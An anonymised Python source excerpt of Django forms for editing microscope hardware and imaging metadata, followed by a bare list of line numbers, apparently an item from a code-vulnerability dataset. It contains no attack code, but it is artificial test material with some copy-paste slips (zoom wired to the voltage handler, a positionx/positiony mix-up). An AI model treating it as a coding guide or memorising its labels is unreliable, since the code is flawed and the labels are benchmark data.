VAR_12["initial"]["filter"].id, "transmittance"
),
}
),
initial=formatPercentFraction(
VAR_12["initial"]["filter"]
.getTransmittanceRange()
.transmittance
),
label="Transmittance (%)",
required=False,
)
else:
self.fields["transmittance"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["filter"].id, "transmittance"
),
}
),
required=False,
)
FUNC_1(self.fields["transmittance"])
except Exception:
self.fields["transmittance"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["transmittance"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
"filterWheel",
"cutIn",
"cutOut",
"cutInTolerance",
"cutOutTolerance",
"transmittance",
]
class CLASS_18(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_18, self).__init__(*VAR_11, **VAR_12)
VAR_39 = VAR_12["initial"]["detectorSettings"]
VAR_40 = VAR_12["initial"]["detector"]
try:
if VAR_40 is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "manufacturer"),
}
),
initial=VAR_40.manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "manufacturer"),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_40 is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "model"),
}
),
initial=VAR_40.model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "model"),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_40 is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "serialNumber"),
}
),
initial=VAR_40.serialNumber,
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "serialNumber"),
}
),
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_40 is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "lotNumber"),
}
),
initial=VAR_40.lotNumber,
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "lotNumber"),
}
),
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_40.getDetectorType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_40.id, "type", VAR_7=True)
}
),
initial=VAR_40.getDetectorType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_40.id, "type", VAR_7=True)
}
),
required=False,
)
FUNC_1(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["type"])
try:
if VAR_39 is not None:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": FUNC_0(VAR_39.id, "gain")}
),
initial=VAR_39.gain,
required=False,
)
elif VAR_40 is not None:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "gain"),
}
),
initial=VAR_40.gain,
required=False,
)
else:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": FUNC_0(VAR_39.id, "gain")}
),
required=False,
)
FUNC_1(self.fields["gain"])
except Exception:
self.fields["gain"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["gain"])
try:
if VAR_39 is not None and VAR_39.voltage is not None:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "voltage"),
}
),
initial=VAR_39.voltage.getValue(),
label="Voltage (%VAR_23)" % VAR_39.voltage.getSymbol(),
required=False,
)
elif VAR_40 is not None:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "voltage"),
}
),
initial=VAR_40.voltage.getValue(),
label="Voltage (%VAR_23)" % VAR_40.voltage.getSymbol(),
required=False,
)
else:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "voltage"),
}
),
required=False,
)
FUNC_1(self.fields["voltage"])
except Exception:
self.fields["voltage"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["voltage"])
try:
if VAR_39 is not None:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "offsetValue"),
}
),
initial=VAR_39.offsetValue,
label="Offset",
required=False,
)
elif VAR_40 is not None:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "offsetValue"),
}
),
initial=VAR_40.offsetValue,
label="Offset",
required=False,
)
else:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "offsetValue"),
}
),
label="Offset",
required=False,
)
FUNC_1(self.fields["offsetValue"])
except Exception:
self.fields["offsetValue"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Offset",
required=False,
)
FUNC_1(self.fields["offsetValue"])
try:
if VAR_40 is not None:
self.fields["zoom"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "voltage"),
}
),
initial=VAR_40.zoom,
required=False,
)
else:
self.fields["zoom"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "voltage"),
}
),
required=False,
)
FUNC_1(self.fields["zoom"])
except Exception:
self.fields["zoom"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["zoom"])
try:
if VAR_40 is not None:
self.fields["amplificationGain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "amplificationGain"),
}
),
initial=VAR_40.amplificationGain,
label="Amplification gain",
required=False,
)
else:
self.fields["amplificationGain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "amplificationGain"),
}
),
label="Amplification gain",
required=False,
)
FUNC_1(self.fields["amplificationGain"])
except Exception:
self.fields["amplificationGain"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Amplification gain",
required=False,
)
FUNC_1(self.fields["amplificationGain"])
try:
if VAR_39 is not None and VAR_39.readOutRate is not None:
self.fields["readOutRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "readOutRate"),
}
),
initial=VAR_39.readOutRate.getValue(),
label=("Read out rate (%VAR_23)" % VAR_39.readOutRate.getSymbol()),
required=False,
)
else:
self.fields["readOutRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "readOutRate"),
}
),
label="Read out rate",
required=False,
)
FUNC_1(self.fields["readOutRate"])
except Exception:
self.fields["readOutRate"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Read out rate",
required=False,
)
FUNC_1(self.fields["readOutRate"])
try:
if VAR_39 is not None:
self.fields["binning"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["binnings"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_39.id, "type", VAR_7=True)
}
),
initial=VAR_39.getBinning().value,
required=False,
)
else:
self.fields["binning"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["binnings"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_39.id, "type", VAR_7=True)
}
),
required=False,
)
FUNC_1(self.fields["binning"])
except Exception:
self.fields["binning"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["binning"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
"gain",
"voltage",
"offsetValue",
"zoom",
"amplificationGain",
"readOutRate",
"binning",
]
class CLASS_19(forms.Form):
VAR_24 = (
("", "---------"),
("True", "True"),
("False", "False"),
)
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_19, self).__init__(*VAR_11, **VAR_12)
VAR_41 = VAR_12["initial"]["lightSource"]
VAR_42 = None
if "lightSourceSettings" in VAR_12["initial"]:
VAR_42 = VAR_12["initial"]["lightSourceSettings"]
self.lightSourceType = VAR_41.OMERO_CLASS
try:
if VAR_41.manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
initial=VAR_41.manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_41.model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
initial=VAR_41.model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_41.serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "serialNumber"),
}
),
initial=VAR_41.serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "serialNumber"),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_41.lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "lotNumber"),
}
),
initial=VAR_41.lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "lotNumber"),
}
),
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_41.power is not None:
self.fields["power"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "power"),
}
),
initial=VAR_41.power.getValue(),
label="Power (%VAR_23)" % VAR_41.power.getSymbol(),
required=False,
)
else:
self.fields["power"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "power"),
}
),
required=False,
)
FUNC_1(self.fields["power"])
except Exception:
self.fields["power"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["power"])
try:
if VAR_41.getLightSourceType() is not None:
self.fields["lstype"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["lstypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "type", VAR_7=True
)
}
),
label="Type",
initial=VAR_41.getLightSourceType().value,
required=False,
)
else:
self.fields["lstype"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["lstypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "type", VAR_7=True
)
}
),
label="Type",
required=False,
)
FUNC_1(self.fields["lstype"])
except Exception:
self.fields["lstype"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Type",
required=False,
)
FUNC_1(self.fields["lstype"])
try:
VAR_45 = VAR_41.getPump()
VAR_46 = VAR_45.OMERO_CLASS # E.g. 'Arc'
VAR_47 = VAR_45.getModel()
VAR_48 = "%VAR_23: %s" % (VAR_46, VAR_47)
self.fields["pump"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial=VAR_48,
required=False,
)
except Exception:
self.fields["pump"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["pump"])
try:
if VAR_41.getLaserMedium() is not None:
self.fields["lmedium"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "medium", VAR_7=True
)
}
),
initial=VAR_41.getLaserMedium().value,
label="Medium",
required=False,
)
else:
self.fields["lmedium"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "medium", VAR_7=True
)
}
),
label="Medium",
required=False,
)
FUNC_1(self.fields["lmedium"])
except Exception:
self.fields["lmedium"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Medium",
required=False,
)
FUNC_1(self.fields["lmedium"])
try:
if (
VAR_42 is not None
and VAR_42.wavelength is not None
):
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "wavelength"),
}
),
initial=VAR_42.wavelength.getValue(),
label=(
"Wavelength (%VAR_23)" % VAR_42.wavelength.getSymbol()
),
required=False,
)
elif VAR_41.wavelength is not None:
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "wavelength"),
}
),
initial=VAR_41.wavelength.getValue(),
label=("Wavelength (%VAR_23)" % VAR_41.wavelength.getSymbol()),
required=False,
)
else:
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "wavelength"),
}
),
required=False,
)
FUNC_1(self.fields["wavelength"])
except Exception:
self.fields["wavelength"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["wavelength"])
try:
if VAR_41.frequencyMultiplication is not None:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_41.id, "frequencyMultiplication"
),
}
),
initial=VAR_41.frequencyMultiplication,
label="Frequency Multiplication",
required=False,
)
else:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_41.id, "frequencyMultiplication"
),
}
),
label="Frequency Multiplication",
required=False,
)
FUNC_1(self.fields["frequencyMultiplication"])
except Exception:
self.fields["frequencyMultiplication"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Frequency Multiplication",
required=False,
)
FUNC_1(self.fields["frequencyMultiplication"])
try:
if VAR_41.tuneable is not None:
self.fields["tuneable"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "tuneable", VAR_7=True
)
}
),
initial=VAR_41.tuneable,
required=False,
)
else:
self.fields["tuneable"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "tuneable", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["tuneable"])
except Exception:
self.fields["tuneable"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["tuneable"])
try:
if VAR_41.pulse is not None:
self.fields["pulse"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["pulses"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pulse", VAR_7=True
)
}
),
initial=VAR_41.pulse,
required=False,
)
else:
self.fields["pulse"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["pulses"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pulse", VAR_7=True
)
}
),
required=False,
)
FUNC_1(self.fields["pulse"])
except Exception:
self.fields["pulse"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["pulse"])
try:
if VAR_41.repetitionRate is not None:
self.fields["repetitionRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "repetitionRate"),
}
),
initial=VAR_41.repetitionRate.getValue(),
label=(
"Repetition rate (%VAR_23)" % VAR_41.repetitionRate.getSymbol()
),
required=False,
)
else:
self.fields["repetitionRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "repetitionRate"),
}
),
label="Repetition rate",
required=False,
)
FUNC_1(self.fields["repetitionRate"])
except Exception:
self.fields["repetitionRate"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Repetition rate",
required=False,
)
FUNC_1(self.fields["repetitionRate"])
try:
if VAR_41.pockelCell is not None:
self.fields["pockelCell"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pockelCell", VAR_7=True
)
}
),
initial=VAR_41.pockelCell,
label="Pockel Cell",
required=False,
)
else:
self.fields["pockelCell"] = forms.ChoiceField(
VAR_36=self.BOOLEAN_CHOICES,
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "pockelCell", VAR_7=True
)
}
),
label="Pockel Cell",
required=False,
)
FUNC_1(self.fields["pockelCell"])
except Exception:
self.fields["pockelCell"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Pockel Cell",
required=False,
)
FUNC_1(self.fields["pockelCell"])
if (
VAR_42 is not None
and VAR_42.attenuation is not None
):
self.fields["attenuation"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_42.id, "attenuation"
),
}
),
initial=formatPercentFraction(VAR_42.attenuation),
label="Attenuation (%)",
required=False,
)
else:
self.fields["attenuation"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["attenuation"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"power",
"lstype",
"pump",
"lmedium",
"wavelength",
"frequencyMultiplication",
"tuneable",
"pulse",
"repetitionRate",
"pockelCell",
"attenuation",
]
class CLASS_20(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_20, self).__init__(*VAR_11, **VAR_12)
VAR_43 = VAR_12["initial"]["image"].getImagingEnvironment()
try:
if VAR_43.temperature is not None:
self.fields["temperature"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "temperature"
),
}
),
initial=VAR_43.temperature.getValue(),
label=("Temperature (%VAR_23)" % VAR_43.temperature.getSymbol()),
required=False,
)
else:
self.fields["temperature"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "temperature"
),
}
),
required=False,
)
FUNC_1(self.fields["temperature"])
except Exception:
self.fields["temperature"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["temperature"])
try:
if VAR_43.airPressure is not None:
self.fields["airPressure"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "airPressure"
),
}
),
initial=VAR_43.airPressure.getValue(),
label=("Air Pressure (%VAR_23)" % VAR_43.airPressure.getSymbol()),
required=False,
)
else:
self.fields["airPressure"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "airPressure"
),
}
),
label="Air Pressure",
required=False,
)
FUNC_1(self.fields["airPressure"])
except Exception:
self.fields["airPressure"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
label="Air Pressure",
initial="N/A",
required=False,
)
FUNC_1(self.fields["airPressure"])
try:
if VAR_43.humidity is not None:
self.fields["humidity"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "humidity"
),
}
),
initial=VAR_43.humidity,
required=False,
)
else:
self.fields["humidity"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "humidity"
),
}
),
required=False,
)
FUNC_1(self.fields["humidity"])
except Exception:
self.fields["humidity"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["humidity"])
try:
if VAR_43.co2percent is not None:
self.fields["co2percent"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "co2percent"
),
}
),
initial=VAR_43.co2percent,
label="CO2 (%)",
required=False,
)
else:
self.fields["co2percent"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "co2percent"
),
}
),
label="CO2 (%)",
required=False,
)
FUNC_1(self.fields["co2percent"])
except Exception:
self.fields["co2percent"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="CO2 (%)",
required=False,
)
FUNC_1(self.fields["co2percent"])
self.fields.keyOrder = ["airPressure", "co2percent", "humidity", "temperature"]
class CLASS_21(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_21, self).__init__(*VAR_11, **VAR_12)
try:
if VAR_12["initial"]["image"].getStageLabel() is not None:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionx"
),
}
),
initial=VAR_12["initial"]["image"].getStageLabel().positionx,
label="Position X",
required=False,
)
else:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionx"
),
}
),
label="Position X",
required=False,
)
FUNC_1(self.fields["positionx"])
except Exception:
self.fields["positionx"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position X",
required=False,
)
FUNC_1(self.fields["positionx"])
try:
if VAR_12["initial"]["image"].getStageLabel() is not None:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positiony"
),
}
),
initial=VAR_12["initial"]["image"].getStageLabel().positiony,
label="Position Y",
required=False,
)
else:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positiony"
),
}
),
label="Position Y",
required=False,
)
FUNC_1(self.fields["positiony"])
except Exception:
self.fields["positiony"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position Y",
required=False,
)
FUNC_1(self.fields["positionx"])
try:
if VAR_12["initial"]["image"].getStageLabel() is not None:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionz"
),
}
),
initial=VAR_12["initial"]["image"].getStageLabel().positionz,
label="Position Z",
required=False,
)
else:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(
VAR_12["initial"]["image"].id, "positionz"
),
}
),
label="Position Z",
required=False,
)
FUNC_1(self.fields["positionz"])
except Exception:
self.fields["positionz"] = forms.CharField(
max_length=100,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Position Z",
required=False,
)
FUNC_1(self.fields["positionz"])
self.fields.keyOrder = ["positionx", "positiony", "positionz"]
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
29,
34,
43,
45,
46,
47,
48,
49,
50,
52,
58,
64,
65,
66,
67,
68,
69,
71,
73,
74,
78,
98,
108,
109,
110,
128,
129,
133,
145,
146,
148,
154,
155,
157,
159,
160,
162,
166,
167,
175,
178,
194,
212,
230,
248,
264,
284,
300,
316,
317,
322,
325,
327,
337,
338,
341,
345,
346,
348,
349,
358,
360,
361,
364,
365,
404,
405,
420,
421,
422,
423,
424,
425,
432,
434,
435,
440,
441,
445,
446,
447,
448,
480,
481,
518,
519,
556,
557,
594,
595,
632,
633,
667,
668,
706,
707,
748,
749,
787,
788,
825,
838,
839,
843,
844,
882,
883,
921,
922,
965,
966,
1007,
1009,
1010,
1014,
1015,
1053,
1054,
1092,
1093,
1134,
1135,
1176,
1177,
1215,
1223,
1224,
1228,
1229,
1267,
1268,
1306,
1307,
1348,
1349,
1393,
1394,
1437,
1438,
1481,
1482,
1522,
1523,
1565,
1566,
1600,
1609,
1610,
1654,
1655,
1691,
1705,
1706,
1708,
1714,
1717,
1718,
1719,
1720,
1763,
1764,
1806,
1807,
1850,
1867,
1868,
1872,
1873,
1874,
1875,
1913,
1914,
1952,
1953,
1994,
1995,
2036,
2037,
2078,
2079,
2117,
2118,
2162,
2163,
2204,
2205,
2246,
2247,
2288,
2289,
2332,
2346,
2347,
2351,
2354,
2355,
2389,
2390,
2424,
2425,
2459,
2460,
2461,
2495,
2496,
2530,
2531,
2571,
2572,
2620,
2621,
2671,
2672,
2706,
2707,
2744,
2745,
2782,
2783,
2817,
2832,
2833,
2835,
2841,
2844,
2849,
2851,
2852,
2886,
2887,
2921,
2922,
2959,
2960,
2997,
2998,
3033,
3034,
3075,
3076,
3078,
3090,
3098,
3099,
3140,
3141,
3194,
3195,
3236,
3237,
3273,
3274,
3312,
3313,
3352,
3353,
3392,
3393,
3420,
3438,
3439,
3443,
3444,
3445,
3447,
3486,
3487,
3528,
3529,
3567,
3568,
3609,
3611,
3612,
3616,
3617,
3618,
3619,
3660,
3661,
3702,
3703,
3744,
3746,
169,
170,
171,
172,
173,
174,
319,
320,
321,
